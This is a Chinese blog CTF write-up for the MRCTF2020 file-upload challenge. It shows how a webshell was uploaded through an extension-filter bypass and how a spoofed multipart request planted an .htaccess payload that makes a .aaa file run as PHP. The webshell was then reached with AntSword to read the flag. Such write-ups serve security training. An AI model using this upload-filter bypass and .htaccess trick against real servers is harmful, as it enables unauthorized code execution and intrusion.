[MRCTF2020]你传你呢 1
[MRCTF2020]你传你呢 1
根据题目可知,这是一道getshell题
上传一句话木马
上传失败,尝试大小写和%00和phtml,均未成功,好像是字段被过滤了
尝试.aaa,显示上传成功
回显路径也是正确的,接下来就是解决php解析问题
采用.htaccess配置文件解析方式,上传解析payload,记得修改Content-Type,将当前文件夹下的某个文件解析成php
<FilesMatch "php_ma.aaa" >
SetHandler application/x-httpd-php
</FilesMatch>
------WebKitFormBoundaryyIlvvQKqnFA9YbfX
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png
<FilesMatch "php_ma.aaa" >
SetHandler application/x-httpd-php
</FilesMatch>
------WebKitFormBoundaryyIlvvQKqnFA9YbfX
Content-Disposition: form-data; name="submit"
一键去世
------WebKitFormBoundaryyIlvvQKqnFA9YbfX--
上传成功
因为一句话木马传了个phpinfo(),所以访问地址,解析成功
根据路径前面一句话木马地址,蚁剑连接
根目录找到flag
flag{ab430d2b-7277-4304-96c2-adc09b00062a}
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18535667
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具